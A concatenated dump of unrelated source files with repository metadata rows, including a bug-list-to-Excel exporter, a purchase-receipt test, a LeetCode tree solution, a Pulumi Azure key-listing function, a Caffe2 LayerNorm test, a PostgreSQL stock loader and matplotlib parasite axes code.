'bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, ' \
'intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex ' \
'from bugcount.buglist '
thtuples = execute_onesql_returnth(sql)
print("====================thtuple=", thtuples)
# tdtuples = execute_onesql(searchsql)
# print("excel内容=========", tdtuples)
# 3. 写入excel
# XlsxWriter方式创建workbook
excelabspath = rootdir + "\\" + excelrelpath
print("excel绝对路径=", excelabspath)
book = xlsxwriter.Workbook(excelabspath)
# 返回的这种格式的 (('1808',), ('C8 3+4G',), ('FH03',), ('JC二期',), ('K项目',), ('K项目-多仓库',), ('K项目-马来',), ('K项目-鹰潭',), ('LJG',), ('WRJ',), ('ZG',), ('大S北向审计日志系统',), ('大S项目',), ('视频问题',))
for i in projects:
# print("!!!!!!!!项目==", i)
index = projects.index(i)
print("!!!!!!!!项目type==", i[0])
print("!!!!!!!!项目type==", type(i[0]))
# lsxwriter.exceptions.InvalidWorksheetName: Invalid Excel character '[]:*?/\' in sheetname 'K项目/K项目-多仓库'.
# excel不支持sheet里写入带/的
sheetN = book.add_worksheet(str(i[0]).replace('/', '-'))
# 1. 每个表写入表头
# 如果ifwrite_th = True,写入表头,写上字段信息,写入时将英文转成中文表头
if ifwrite_th is True:
for th in range(0, len(thtuples)): # th是数字
# print("表头", thtuples[th][0])
# sheetN.write(0, th, thtuples[th][0])
sheetN.write(0, th, tableheaddict[thtuples[th][0]])
# 2. 获取表数据
tdtuples = execute_onesql(searchsql, i[0])
# 3.写入数据
# 获取并写入数据段信息
row = 1
col = 0
for row in range(1, len(tdtuples) + 1):
for col in range(0, len(thtuples)):
if tdtuples[row - 1][col] is None or tdtuples[row - 1][col] == '': # 表格内容是None,替换成空字符串
sheetN.write(row, col, '')
else:
# 转换日期格式 ‘提交日期’列数从0开始
if col == 0:
# 不为空的话,转成YYYY-MM-DD这种格式的,
# sheetN.write(row, col, datetime.strptime(tdtuples[row - 1][col], '%Y-%m-%d').date().strftime("%Y/%m/%d")) # 导出前已经是日期格式,这样写法错误
# print("?????????????", tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
# sheetN.write(row, col, tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
sheetN.write(row, col, datetime.strftime(tdtuples[row - 1][col], "%Y/%#m/%#d")) # 转成日期格式str
# 将 ‘关闭情况’int--> 文字
elif col == 8: # 第9列是 ‘关闭情况’
# print('tdtuples[row - 1][col]type======================', type(tdtuples[row - 1][col])) # int
# print('tdtuples[row - 1][col]======================', tdtuples[row - 1][col])
if tdtuples[row - 1][col] == 1:
# tdtuples[row - 1][col] = '处理' # 因为tuple 不能复制,所以这种写法错误,报错TypeError: 'tuple' object does not support item assignment
sheetN.write(row, col, '处理')
elif tdtuples[row - 1][col] == 2:
sheetN.write(row, col, '关闭')
elif tdtuples[row - 1][col] == 3:
sheetN.write(row, col, '回归')
elif tdtuples[row - 1][col] == 4:
sheetN.write(row, col, '延迟')
elif tdtuples[row - 1][col] == 5:
sheetN.write(row, col, '重开')
else:
sheetN.write(row, col, '未知')
elif col == 9: # 关闭时间
# 不为空
# print("?????????????当前值", tdtuples[row - 1][col])
# print("?????????????当前值type", type(tdtuples[row - 1][col]))
# print("?????????????", tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
sheetN.write(row, col, tdtuples[row - 1][col].strftime("%Y/%#m/%#d"))
else:
sheetN.write(row, col, u'%s' % tdtuples[row - 1][col]) # 写入具体内容
book.close() # 必须关闭流,否则写不进去
# 4. 重置json数据,顺序执行完就算陈公公
code = 200
msg = '写入excel数据成功'
count = len(thtuples)
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
# 另存为到用户自定义文件,并写入excel文件
"""
功能:写入excel文件
参数:1. excelabspath : excel文件的输出绝对路径,结尾必须带上文件后缀,基于项目根目录的路径。如 根目录是“D:” excelrelapath = "test1.xlsx" ->最前面不用加\\
2. searchsql : 查询语句
2. ifwirte_th : 是否写入表头,默认是True,即写入表头
注意:1. excel文件名不存在会自动创建
2. excel文件上级文件夹,如果不存在,不会自动创建
"""
def wirte2excelfile_storage_returnjson(excelabspath, searchsql, ifwrite_th=True):
# 1. 初始化json数据
code = 500 # 默认失败
count = 0 # sql语句执行结果个数
data = {}
buglist = []
msg = '写入excel数据失败'
# 2. 执行sql语句,获取返回值
# sql = 'select bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex from bugcount.buglist'
thtuples = execute_onesql_returnth(searchsql)
print("====================thtuple=", thtuples)
tdtuples = execute_onesql(searchsql)
# print("excel内容=========", tdtuples)
# 3. 写入excel
# XlsxWriter方式创建workbook
print("excel绝对路径=", excelabspath)
book = xlsxwriter.Workbook(excelabspath)
sheet1 = book.add_worksheet("Sheet1") # 写入哪个sheet
# 如果ifwrite_th = True,写入表头,写上字段信息,写入时将英文转成中文表头
if ifwrite_th is True:
for th in range(0, len(thtuples)): # th是数字
# print("表头", thtuples[th][0])
# sheet1.write(0, th, thtuples[th][0])
sheet1.write(0, th, tableheaddict[thtuples[th][0]])
# 写入数据
# 获取并写入数据段信息
row = 1
col = 0
for row in range(1, len(tdtuples) + 1):
for col in range(0, len(thtuples)):
if tdtuples[row - 1][col] is None: # 表格内容是None,替换成空字符串
sheet1.write(row, col, '')
else:
sheet1.write(row, col, u'%s' % tdtuples[row - 1][col]) # 写入具体内容
book.close() # 必须关闭流,否则写不进去
# 4. 重置json数据,顺序执行完就算陈公公
code = 200
msg = '写入excel数据成功'
count = len(thtuples)
# 5.返回json格式的数据
data['code'] = code
data['msg'] = msg
data['count'] = count
data['data'] = buglist
# 转化下查询结果为{},{},{}这种格式======================
json_str = json.dumps(data, ensure_ascii=False)
print('dbutil==jsonStr=====', json_str)
return json_str
| 35.567143 | 539 | 0.556111 |
fe5fcb4f14ca4883aa4b03eabff24efa4c3fa0e1 | 1,501 | py | Python | mkt/purchase/tests/test_webpay_tasks.py | diox/zamboni | 3d3bebdffe034a5cd97a66cedc32a598264c2e42 | [
"BSD-3-Clause"
] | null | null | null | mkt/purchase/tests/test_webpay_tasks.py | diox/zamboni | 3d3bebdffe034a5cd97a66cedc32a598264c2e42 | [
"BSD-3-Clause"
] | null | null | null | mkt/purchase/tests/test_webpay_tasks.py | diox/zamboni | 3d3bebdffe034a5cd97a66cedc32a598264c2e42 | [
"BSD-3-Clause"
] | null | null | null | import uuid
from django.core import mail
from mock import patch
from nose.tools import eq_, ok_
import mkt
from mkt.purchase import tasks as tasks
from mkt.purchase.models import Contribution
from mkt.purchase.tests.utils import PurchaseTest
class TestReceiptEmail(PurchaseTest):
def setUp(self):
super(TestReceiptEmail, self).setUp()
self.contrib = Contribution.objects.create(addon_id=self.addon.id,
amount=self.price.price,
uuid=str(uuid.uuid4()),
type=mkt.CONTRIB_PURCHASE,
user=self.user,
source_locale='en-us')
def test_send(self):
tasks.send_purchase_receipt(self.contrib.pk)
eq_(len(mail.outbox), 1)
@patch('mkt.purchase.tasks.send_html_mail_jinja')
def test_data(self, send_mail_jinja):
with self.settings(SITE_URL='http://f.com'):
tasks.send_purchase_receipt(self.contrib.pk)
args = send_mail_jinja.call_args
data = args[0][3]
eq_(args[1]['recipient_list'], [self.user.email])
eq_(data['app_name'], self.addon.name)
eq_(data['developer_name'], self.addon.current_version.developer_name)
eq_(data['price'], self.contrib.get_amount_locale('en_US'))
ok_(data['purchases_url'].startswith('http://f.com'))
| 34.906977 | 78 | 0.584943 |
d9a3c0253584a9a81361095d2d12d85951e67b05 | 1,444 | py | Python | Leetcode/105.construct-binary-tree-from-preorder-and-inorder-traversal.py | EdwaRen/Competitve-Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | 1 | 2021-05-03T21:48:25.000Z | 2021-05-03T21:48:25.000Z | Leetcode/105.construct-binary-tree-from-preorder-and-inorder-traversal.py | EdwaRen/Competitve_Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | null | null | null | Leetcode/105.construct-binary-tree-from-preorder-and-inorder-traversal.py | EdwaRen/Competitve_Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def buildTree(self, preorder, inorder):
# Create an index to map values to their index in the inorder array.
index_map = {val:index for index, val in enumerate(inorder) }
# Global variable keeping track of preorder index
self.pre_index = 0
return self.recurseBuild(index_map, preorder, inorder, 0, len(inorder))
def recurseBuild(self, index_map, preorder, inorder, start, end):
# A branch end is detected when the starting index of an array is bigger than end index
if start >= end:
return None
# split is the index in inorder which has the same value as the current root in preorder
split = index_map[preorder[self.pre_index]]
self.pre_index +=1
# Create current node
cur = TreeNode(preorder[self.pre_index-1])
# Iterate with new start and end limits based on index of next preorder
cur.left = self.recurseBuild(index_map, preorder, inorder, start, split)
cur.right = self.recurseBuild(index_map, preorder, inorder, split+1, end)
return cur
z = Solution()
preorder = [3, 9, 20, 15, 7]
inorder = [9, 3, 15, 20, 7]
a = (z.buildTree(preorder, inorder))
#print(z.printTree(a))
| 32.088889 | 103 | 0.641274 |
5ea07fb5351baf806b91e0658279c31ba801cd18 | 2,583 | py | Python | sdk/python/pulumi_azure_native/eventgrid/v20200401preview/list_topic_shared_access_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/eventgrid/v20200401preview/list_topic_shared_access_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/eventgrid/v20200401preview/list_topic_shared_access_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'ListTopicSharedAccessKeysResult',
'AwaitableListTopicSharedAccessKeysResult',
'list_topic_shared_access_keys',
]
@pulumi.output_type
class ListTopicSharedAccessKeysResult:
"""
Shared access keys of the Topic
"""
def __init__(__self__, key1=None, key2=None):
if key1 and not isinstance(key1, str):
raise TypeError("Expected argument 'key1' to be a str")
pulumi.set(__self__, "key1", key1)
if key2 and not isinstance(key2, str):
raise TypeError("Expected argument 'key2' to be a str")
pulumi.set(__self__, "key2", key2)
@property
@pulumi.getter
def key1(self) -> Optional[str]:
"""
Shared access key1 for the topic.
"""
return pulumi.get(self, "key1")
@property
@pulumi.getter
def key2(self) -> Optional[str]:
"""
Shared access key2 for the topic.
"""
return pulumi.get(self, "key2")
class AwaitableListTopicSharedAccessKeysResult(ListTopicSharedAccessKeysResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return ListTopicSharedAccessKeysResult(
key1=self.key1,
key2=self.key2)
def list_topic_shared_access_keys(resource_group_name: Optional[str] = None,
topic_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListTopicSharedAccessKeysResult:
"""
Shared access keys of the Topic
:param str resource_group_name: The name of the resource group within the user's subscription.
:param str topic_name: Name of the topic.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['topicName'] = topic_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:eventgrid/v20200401preview:listTopicSharedAccessKeys', __args__, opts=opts, typ=ListTopicSharedAccessKeysResult).value
return AwaitableListTopicSharedAccessKeysResult(
key1=__ret__.key1,
key2=__ret__.key2)
| 32.696203 | 168 | 0.665892 |
abe6646d78e5b582d922bc0bb0a1584ee3536d43 | 4,361 | py | Python | pytorch-frontend/caffe2/contrib/fakelowp/test/test_layernorm_nnpi_fp16.py | AndreasKaratzas/stonne | 2915fcc46cc94196303d81abbd1d79a56d6dd4a9 | [
"MIT"
] | 40 | 2021-06-01T07:37:59.000Z | 2022-03-25T01:42:09.000Z | pytorch-frontend/caffe2/contrib/fakelowp/test/test_layernorm_nnpi_fp16.py | AndreasKaratzas/stonne | 2915fcc46cc94196303d81abbd1d79a56d6dd4a9 | [
"MIT"
] | 14 | 2021-06-01T11:52:46.000Z | 2022-03-25T02:13:08.000Z | pytorch-frontend/caffe2/contrib/fakelowp/test/test_layernorm_nnpi_fp16.py | AndreasKaratzas/stonne | 2915fcc46cc94196303d81abbd1d79a56d6dd4a9 | [
"MIT"
] | 7 | 2021-07-20T19:34:26.000Z | 2022-03-13T21:07:36.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import caffe2.python.fakelowp.init_shared_libs # noqa
from caffe2.proto import caffe2_pb2
from caffe2.python import core
from caffe2.python import workspace
from caffe2.python.onnx.onnxifi import onnxifi_caffe2_net
from caffe2.python.fakelowp.test_utils import print_test_debug_info
from hypothesis import given, settings
from hypothesis import strategies as st
import caffe2.python.serialized_test.serialized_test_util as serial
core.GlobalInit(["caffe2",
"--glow_global_fp16=1",
"--glow_global_fused_scale_offset_fp16=1",
"--glow_global_force_sls_fp16_accum=1"])
GLOW_LOWERED_BATCHNORM = False
# Test the lowered LayerNorm op
class LayerNorm(serial.SerializedTestCase):
@given(seed=st.integers(0, 65535),
batch_size=st.integers(min_value=1, max_value=50),
size=st.integers(min_value=2, max_value=128),
epsilon=st.floats(min_value=1e-4, max_value=1e-3),
elementwise_affine=st.booleans())
@settings(max_examples=100, deadline=None)
def Skip_test_layernorm(self, seed, batch_size, size, epsilon, elementwise_affine):
np.random.seed(seed)
# Reset the workspace
workspace.ResetWorkspace()
axis = 1
dims = np.array(([batch_size, size]))
X = np.random.uniform(size=dims).astype(np.float32) - 0.5
gamma = np.random.randn(*X.shape[axis:]).astype(np.float32)
beta = np.random.randn(*X.shape[axis:]).astype(np.float32)
pred_net = caffe2_pb2.NetDef()
pred_net.name = "pred"
pred_net.external_input.extend(["X", "gamma", "beta"])
pred_net.external_output.extend(["Y", "mean", "rstd"])
pred_net.op.add().CopyFrom(
core.CreateOperator(
"LayerNorm",
["X", "gamma", "beta"] if elementwise_affine else ["X"],
["Y", "mean", "rstd"],
axis=axis,
epsilon=epsilon,
elementwise_affine=elementwise_affine
)
)
pred_net_ref = caffe2_pb2.NetDef()
pred_net_ref.name = "pred_ref"
pred_net_ref.external_input.extend(["X", "gamma", "beta"])
pred_net_ref.external_output.extend(["Y", "mean", "rstd"])
pred_net_ref.op.add().CopyFrom(
core.CreateOperator(
"LayerNormFakeFP16NNPI",
["X", "gamma", "beta"] if elementwise_affine else ["X"],
["Y", "mean", "rstd"],
axis=axis,
epsilon=epsilon,
elementwise_affine=elementwise_affine
)
)
shape_hits = {"X": X.shape, "gamma": gamma.shape, "beta": beta.shape}
pred_net_onnxified = onnxifi_caffe2_net(
pred_net,
shape_hits,
debug=True,
adjust_batch=True,
use_onnx=False
)
num_onnxified_ops = sum(
1 if o.type == "Onnxifi" else 0 for o in pred_net_onnxified.op)
np.testing.assert_equal(num_onnxified_ops, 1)
workspace.FeedBlob("X", X)
workspace.FeedBlob("gamma", gamma)
workspace.FeedBlob("beta", beta)
workspace.CreateNet(pred_net_ref)
workspace.CreateNet(pred_net_onnxified)
workspace.RunNet(pred_net_ref.name)
Y_c2 = workspace.FetchBlob("Y")
dims1 = np.array(([1, *dims]))
X_glow = X.reshape(dims1)
workspace.FeedBlob("X", X_glow)
workspace.RunNet(pred_net_onnxified.name)
Y_glow = workspace.FetchBlob("Y")
if not np.allclose(Y_glow, Y_c2):
diff_Y = np.abs(Y_glow - Y_c2)
print_test_debug_info(
"layernorm",
{
"seed": seed,
"size": size,
"batch_size": batch_size,
"epsilon": epsilon,
"gamma": gamma,
"beta": beta,
"elementwise_affine": elementwise_affine,
"X": X,
"Y_glow": Y_glow,
"Y_c2": Y_c2,
"diff_Y": diff_Y,
}
)
assert(0)
| 35.455285 | 87 | 0.58404 |
bf7b8b2b0506ebf5758d2eda199b1395e39e6165 | 308 | py | Python | salt/output/yaml_out.py | z9g/salt | 26cc7ff467fd66cc7ac37a37fa3bcab42aa5ea4e | [
"Apache-2.0"
] | 1 | 2017-11-19T06:56:46.000Z | 2017-11-19T06:56:46.000Z | salt/output/yaml_out.py | z9g/salt | 26cc7ff467fd66cc7ac37a37fa3bcab42aa5ea4e | [
"Apache-2.0"
] | null | null | null | salt/output/yaml_out.py | z9g/salt | 26cc7ff467fd66cc7ac37a37fa3bcab42aa5ea4e | [
"Apache-2.0"
] | null | null | null | '''
Output data in YAML, this outputter defaults to printing in YAML block mode
for better readability.
'''
# Third Party libs
import yaml
def __virtual__():
return 'yaml'
def output(data):
'''
Print out YAML using the block mode
'''
return yaml.dump(data, default_flow_style=False)
| 16.210526 | 75 | 0.691558 |
39a435d4904a7a27d2a6184acb52353ab03027d2 | 3,965 | py | Python | data_api/StockData/database/postgreSQL.py | powerlim2/project_free_insight | 411bee0b36c1ffd6cf3644269a2056cbc71d44ba | [
"BSD-3-Clause"
] | 2 | 2020-08-23T20:21:08.000Z | 2021-01-16T00:21:43.000Z | data_api/StockData/database/postgreSQL.py | powerlim2/project_free_insight | 411bee0b36c1ffd6cf3644269a2056cbc71d44ba | [
"BSD-3-Clause"
] | null | null | null | data_api/StockData/database/postgreSQL.py | powerlim2/project_free_insight | 411bee0b36c1ffd6cf3644269a2056cbc71d44ba | [
"BSD-3-Clause"
] | null | null | null | from query.postgreSqlQuery import PostgreSqlQuery
from schema import tableSchema
import psycopg2
import database
import datetime
CURRENT_DATE = datetime.datetime.now().strftime('%Y-%m-%d')
class PostgreSQL(database.DB):
"""
Store Stock data into PostgreSQL DB
Static:
db_path: db access path
temp_stock_table_name: the name of temporary stock table (internal use)
Attributes:
stock_table_query: class to generate queries to work with STOCK table in postgreSQL DB.
Methods:
store_stock_price:
"""
__postgre_DB = __postgre_user = __postgre_password = 'insight'
__temp_stock_table_name = 'TEMP_STOCK'
__stock_table_name = 'STOCK'
def __init__(self):
super(self.__class__, self).__init__()
self.stock_table_query = PostgreSqlQuery(tableSchema.STOCK_TABLE_SCHEMA)
try:
argument = "dbname='{0}' user='{1}' password='{2}' host=localhost".format(self.__postgre_DB, self.__postgre_user, self.__postgre_password)
self.connection = psycopg2.connect(argument)
except Exception, errorStack:
print errorStack
raise Exception("Connection Error: unable to connect to postgreSQL DB")
def get_symbols(self, exchange):
"""
retrieve stock symbols
:param exchange: Symbol of Stock Exchange
"""
query = """SELECT symbol FROM SYMBOL WHERE exchange = '{0}';""".format(exchange)
cursor = self.connection.cursor()
cursor.execute(query)
rows = cursor.fetchall()
if len(rows) == 0:
raise Exception('DataNotAvailableException: No data available for the exchange: ' + exchange)
return [row[0] for row in rows]
def store_stock_price(self, stock_data):
"""
UPSERT (stock price, volume, date, dividend) data
:param stock_data: list of dicts
"""
if len(stock_data) == 0:
raise Exception('InvalidInputException: provide appropriate stock data')
self._delete_temp_stock_table()
self._create_temp_stock_table()
self._insert_stock_data_into_temp_table(stock_data)
self._update_and_insert_temp_data()
print """Successfully inserted {0} records into '{1}' table.""".format(len(stock_data), self.__stock_table_name)
return self
def _create_temp_stock_table(self):
create_query = self.stock_table_query.get_create_table_statement(self.__temp_stock_table_name)
cursor = self.connection.cursor()
cursor.execute(create_query)
self.connection.commit()
return self
def _insert_stock_data_into_temp_table(self, stock_data):
insert_query = self.stock_table_query.get_insert_table_statement(self.__temp_stock_table_name)
cursor = self.connection.cursor()
cursor.executemany(insert_query, stock_data)
cursor.execute(self.stock_table_query.get_lock_table_statement(self.__temp_stock_table_name))
self.connection.commit()
return self
def _update_and_insert_temp_data(self):
upsert_query = self.stock_table_query.get_upsert_table_statement(self.__stock_table_name, self.__temp_stock_table_name, CURRENT_DATE)
cursor = self.connection.cursor()
cursor.execute(upsert_query['UPDATE'])
cursor.execute(upsert_query['INSERT'])
self.connection.commit()
return self
def _delete_temp_stock_table(self):
if not self.stock_table_query:
raise Exception('NullClassException: stock_table_query is null!')
query = self.stock_table_query.get_drop_table_statement(self.__temp_stock_table_name)
try:
cursor = self.connection.cursor()
cursor.execute(query)
self.connection.commit()
return self
except Exception, error_stack:
print str(error_stack)
self.connection.rollback()
pass
| 34.780702 | 150 | 0.680454 |
61c241af78d5b01060d4c0ee7283d3b5a71caecb | 1,875 | py | Python | Language-Detector/src/helper.py | EKarton/English-French-Translator | da9cecce49498c4f79946a631206985f99daaed3 | [
"MIT"
] | 1 | 2021-07-10T04:49:23.000Z | 2021-07-10T04:49:23.000Z | Language-Detector/src/helper.py | EKarton/English-French-Translator | da9cecce49498c4f79946a631206985f99daaed3 | [
"MIT"
] | 7 | 2022-01-13T02:37:56.000Z | 2022-03-12T01:00:11.000Z | Language-Detector/src/helper.py | EKarton/English-French-Translator | da9cecce49498c4f79946a631206985f99daaed3 | [
"MIT"
] | 1 | 2020-09-05T10:45:52.000Z | 2020-09-05T10:45:52.000Z | import sys
import argparse
import os
import gzip
import torch
from torch import nn
import torch.nn.functional as F
class ModelCommandLineParser:
def __init__(self):
self.parser = argparse.ArgumentParser(description=__doc__)
def get_options(self, args):
return self.parser.parse_args(args)
def lower_bound(self, v, low=1):
v = int(v)
if v < low:
raise argparse.ArgumentTypeError(f"{v} must be at least {low}")
return v
def possible_gzipped_file(self, path, mode="r", encoding="utf8"):
if path.endswith(".gz"):
open_ = gzip.open
if mode[-1] != "b":
mode += "t"
else:
open_ = open
try:
f = open_(path, mode=mode, encoding=encoding)
except OSError as e:
raise argparse.ArgumentTypeError(f"can't open '{path}': {e}")
return f
def proportion(self, v, inclusive=False):
v = float(v)
if inclusive:
if v < 0.0 or v > 1.0:
raise argparse.ArgumentTypeError(f"{v} must be between [0, 1]")
else:
if v <= 0 or v >= 1:
raise argparse.ArgumentTypeError(f"{v} must be between (0, 1)")
return v
class ArgparseReadableDirAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
prospective_dir = values
if not os.path.isdir(prospective_dir):
raise argparse.ArgumentTypeError(
f"ArgparseReadableDirAction:{prospective_dir} is not a valid path"
)
if os.access(prospective_dir, os.R_OK):
setattr(namespace, self.dest, prospective_dir)
else:
raise argparse.ArgumentTypeError(
f"ArgparseReadableDirAction:{prospective_dir} is not a readable dir"
)
| 29.296875 | 84 | 0.589867 |
f8b740964dfcbfed9f9a749b0ca2b544797abb8f | 1,211 | py | Python | setup.py | raccoongang/xblock-in-video-collaboration | c3b46dc99bfe3198ec3648228fa073b0e1fc00df | [
"Apache-2.0"
] | null | null | null | setup.py | raccoongang/xblock-in-video-collaboration | c3b46dc99bfe3198ec3648228fa073b0e1fc00df | [
"Apache-2.0"
] | 4 | 2020-10-08T13:03:12.000Z | 2022-01-19T02:05:55.000Z | setup.py | raccoongang/xblock-in-video-collaboration | c3b46dc99bfe3198ec3648228fa073b0e1fc00df | [
"Apache-2.0"
] | 1 | 2020-10-08T12:59:28.000Z | 2020-10-08T12:59:28.000Z | """Setup for annoto XBlock."""
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
def package_data(pkg, roots):
"""Generic function to find package_data.
All of the files under each of the `roots` will be declared as package
data for package `pkg`.
"""
data = []
for root in roots:
for dirname, _, files in os.walk(os.path.join(pkg, root)):
for fname in files:
data.append(os.path.relpath(os.path.join(dirname, fname), pkg))
return {pkg: data}
setup(
name='annoto-xblock',
version='1.0.0',
description='An XBlock for adding Annoto in-video collaboration solution to any video',
long_description=README,
license='Apache 2.0',
author='Annoto',
url='https://github.com/Annoto/xblock-in-video-collaboration',
packages=[
'annoto',
],
install_requires=[
'XBlock',
'xblock_utils',
'PyJWT',
],
entry_points={
'xblock.v1': [
'annoto = annoto:AnnotoXBlock',
]
},
package_data=package_data("annoto", ["static", "public", "translations"]),
)
| 23.745098 | 91 | 0.610239 |
b7ee444077f71639f7d2b19cbbb60c63ffff3025 | 13,912 | py | Python | venv/Lib/site-packages/mpl_toolkits/axes_grid1/parasite_axes.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | 603 | 2020-12-23T13:49:32.000Z | 2022-03-31T23:38:03.000Z | venv/Lib/site-packages/mpl_toolkits/axes_grid1/parasite_axes.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | 387 | 2020-12-15T14:54:04.000Z | 2022-03-31T07:00:21.000Z | venv/Lib/site-packages/mpl_toolkits/axes_grid1/parasite_axes.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | 35 | 2021-03-26T03:12:04.000Z | 2022-03-23T10:15:10.000Z | import functools
from matplotlib import _api
import matplotlib.artist as martist
import matplotlib.transforms as mtransforms
from matplotlib.axes import subplot_class_factory
from matplotlib.transforms import Bbox
from .mpl_axes import Axes
class ParasiteAxesBase:
def __init__(self, parent_axes, aux_transform=None,
*, viewlim_mode=None, **kwargs):
self._parent_axes = parent_axes
self.transAux = aux_transform
self.set_viewlim_mode(viewlim_mode)
kwargs["frameon"] = False
super().__init__(parent_axes.figure, parent_axes._position, **kwargs)
def cla(self):
super().cla()
martist.setp(self.get_children(), visible=False)
self._get_lines = self._parent_axes._get_lines
def get_images_artists(self):
artists = {a for a in self.get_children() if a.get_visible()}
images = {a for a in self.images if a.get_visible()}
return list(images), list(artists - images)
def pick(self, mouseevent):
# This most likely goes to Artist.pick (depending on axes_class given
# to the factory), which only handles pick events registered on the
# axes associated with each child:
super().pick(mouseevent)
# But parasite axes are additionally given pick events from their host
# axes (cf. HostAxesBase.pick), which we handle here:
for a in self.get_children():
if (hasattr(mouseevent.inaxes, "parasites")
and self in mouseevent.inaxes.parasites):
a.pick(mouseevent)
# aux_transform support
def _set_lim_and_transforms(self):
if self.transAux is not None:
self.transAxes = self._parent_axes.transAxes
self.transData = self.transAux + self._parent_axes.transData
self._xaxis_transform = mtransforms.blended_transform_factory(
self.transData, self.transAxes)
self._yaxis_transform = mtransforms.blended_transform_factory(
self.transAxes, self.transData)
else:
super()._set_lim_and_transforms()
def set_viewlim_mode(self, mode):
_api.check_in_list([None, "equal", "transform"], mode=mode)
self._viewlim_mode = mode
def get_viewlim_mode(self):
return self._viewlim_mode
@_api.deprecated("3.4", alternative="apply_aspect")
def update_viewlim(self):
return self._update_viewlim
def _update_viewlim(self): # Inline after deprecation elapses.
viewlim = self._parent_axes.viewLim.frozen()
mode = self.get_viewlim_mode()
if mode is None:
pass
elif mode == "equal":
self.axes.viewLim.set(viewlim)
elif mode == "transform":
self.axes.viewLim.set(
viewlim.transformed(self.transAux.inverted()))
else:
_api.check_in_list([None, "equal", "transform"], mode=mode)
def apply_aspect(self, position=None):
self._update_viewlim()
super().apply_aspect()
# end of aux_transform support
@functools.lru_cache(None)
def parasite_axes_class_factory(axes_class=None):
if axes_class is None:
_api.warn_deprecated(
"3.3", message="Support for passing None to "
"parasite_axes_class_factory is deprecated since %(since)s and "
"will be removed %(removal)s; explicitly pass the default Axes "
"class instead.")
axes_class = Axes
return type("%sParasite" % axes_class.__name__,
(ParasiteAxesBase, axes_class), {})
ParasiteAxes = parasite_axes_class_factory(Axes)
@_api.deprecated("3.4", alternative="ParasiteAxesBase")
class ParasiteAxesAuxTransBase:
def __init__(self, parent_axes, aux_transform, viewlim_mode=None,
**kwargs):
# Explicit wrapper for deprecation to work.
super().__init__(parent_axes, aux_transform,
viewlim_mode=viewlim_mode, **kwargs)
def _set_lim_and_transforms(self):
self.transAxes = self._parent_axes.transAxes
self.transData = self.transAux + self._parent_axes.transData
self._xaxis_transform = mtransforms.blended_transform_factory(
self.transData, self.transAxes)
self._yaxis_transform = mtransforms.blended_transform_factory(
self.transAxes, self.transData)
def set_viewlim_mode(self, mode):
_api.check_in_list([None, "equal", "transform"], mode=mode)
self._viewlim_mode = mode
def get_viewlim_mode(self):
return self._viewlim_mode
@_api.deprecated("3.4", alternative="apply_aspect")
def update_viewlim(self):
return self._update_viewlim()
def _update_viewlim(self): # Inline after deprecation elapses.
viewlim = self._parent_axes.viewLim.frozen()
mode = self.get_viewlim_mode()
if mode is None:
pass
elif mode == "equal":
self.axes.viewLim.set(viewlim)
elif mode == "transform":
self.axes.viewLim.set(
viewlim.transformed(self.transAux.inverted()))
else:
_api.check_in_list([None, "equal", "transform"], mode=mode)
def apply_aspect(self, position=None):
self._update_viewlim()
super().apply_aspect()
@_api.deprecated("3.4", alternative="parasite_axes_class_factory")
@functools.lru_cache(None)
def parasite_axes_auxtrans_class_factory(axes_class=None):
if axes_class is None:
_api.warn_deprecated(
"3.3", message="Support for passing None to "
"parasite_axes_auxtrans_class_factory is deprecated since "
"%(since)s and will be removed %(removal)s; explicitly pass the "
"default ParasiteAxes class instead.")
parasite_axes_class = ParasiteAxes
elif not issubclass(axes_class, ParasiteAxesBase):
parasite_axes_class = parasite_axes_class_factory(axes_class)
else:
parasite_axes_class = axes_class
return type("%sParasiteAuxTrans" % parasite_axes_class.__name__,
(ParasiteAxesAuxTransBase, parasite_axes_class),
{'name': 'parasite_axes'})
# Also deprecated.
with _api.suppress_matplotlib_deprecation_warning():
